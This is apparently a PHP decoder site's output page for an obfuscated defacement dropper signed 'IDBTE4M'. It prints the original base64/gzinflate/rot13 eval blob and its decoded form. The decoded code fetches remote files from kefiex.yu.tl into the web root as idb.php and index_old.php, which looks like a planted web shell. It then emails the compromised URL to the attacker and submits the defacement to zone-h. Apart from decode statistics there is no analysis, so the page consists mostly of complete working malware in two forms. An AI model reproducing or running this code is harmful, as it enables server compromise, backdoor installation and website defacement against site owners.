Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<center> <h1>IDBTE4M NEVER DIE</h1> </center> <?php $IDBTE4M = 'lZTxYppDEMd/N+n/YzGm6G..
Decoded Output download
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check5 = $_SERVER['DOCUMENT_ROOT'] . "/idb.php" ;
$text5 = http_get('http://kefiex.yu.tl/files/depes.css');
$open5 = fopen($check5, 'w');
fwrite($open5, $text5);
fclose($open5);
if(file_exists($check5)){
}
$check1 = $_SERVER['DOCUMENT_ROOT'] . "/index_old.php" ;
$text1 = http_get('http://kefiex.yu.tl/files/i.zip');
$open1 = fopen($check1, 'w');
fwrite($open1, $text1);
fclose($open1);
if(file_exists($check1)){
}
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = '[email protected]';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . "/idb.php";
$pesan_alert = "fix $x_path :p *IP Address : [ " .$check1. " ]";
mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
$ch3 = curl_init ("http://www.zone-h.com/notify/single");
curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch3, CURLOPT_POST, 1);
curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=kefiex404&domain1=$x_path&hackmode=1&reason=1"); // here put ur name on zone-h
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3)))
{
}
?>
Did this file decode correctly?
Original Code
<center>
<h1>IDBTE4M NEVER DIE</h1>
</center>
<?php
$IDBTE4M = 'lZTxYppDEMd/N+n/YzGm6G+lpF2z2OkqDeL2g0SaNdO2ITzya1EthaO8FZr+77sHd12z1Q1+AO7dfd997h1qIT3pBiiaGguFHwr3IVlG5NJ71Npj3Do/qF15PRIZ+Gy0ZZFmxoPNOi25Txbo5rKQokza0tCLhXEecU/47iMFN0+et54Pdw1MQA9v+mVWanqniNJPRcwnmyzaMBlMM/PSaS3HHkwD2xoPhkqO1QbjXe+JORg4E9u+njvmyCbv42rdr8zZzPw2Mydw+9oc7BP/7oynKoVFk6MIuUqR4BJw5bqNjmYW4MbyT9RkhvHTVCJiuFDH+upLN9rUnIzmzoAIWtPW7qADaF0mDx0/8+tAbg2BWKFPtjXU1FtK158wlbjsrMKOyPVH5hjoCfoYZ+Ig0NSODeajp09G9dJc794GekQupwsuBaVKbbWh2qhcS+ddLiiDWZtXnwByIIKNQ1gd5Asc1DZgxn4wL8Gly/LkajzjH/Fx5176r3XGGzTjj3XGGs1ri3P8Fc3YTkb3tvULLBhfSC1Bja+dnc7L/TKMEuRaesI8gZ44sko+aU7tqnSiyM8hziJBCr2RfWj0qSIQ4c8w8opV5oShSLR0JxePytKJTKEpp6XrVCIjh/q6Kmiq43iNq6c7GM+dN62jgqkXIs+NZeRPKaRlCRvBrg8fri9unCQcgwC6YwOkvKYnHbhGCiqV5kGieqjPo4zVqaI72nEto2ryspy5djvuazq1qrxVr4SOs5Pd/x6aG67Fb9G5dB4ecopd95iQ6VcPdQDlS4ZPaO38laBB63HPiNgfaXYO7f9lvrppc9MhRCeYUzHyXmhpp8enhwmjMmxTYl3mwyyKnwqWYM845BgFzOsZBAOg65AhVKBWCyEHLyoQdVlJBUNaCVqf46NbUSLOqFVtzGXGe7dojsl6vWL++Hyrp9R4fW3msq9YOpLtCKplYbVNB7XnZex86f8C';
eval(str_rot13(gzinflate(str_rot13(base64_decode(($IDBTE4M))))));
Function Calls
gzinflate | 1 |
str_rot13 | 2 |
base64_decode | 1 |
Stats
MD5 | 5aa50976a08f6a1fe9f7d0a5d53c49e4 |
Eval Count | 1 |
Decode Time | 103 ms |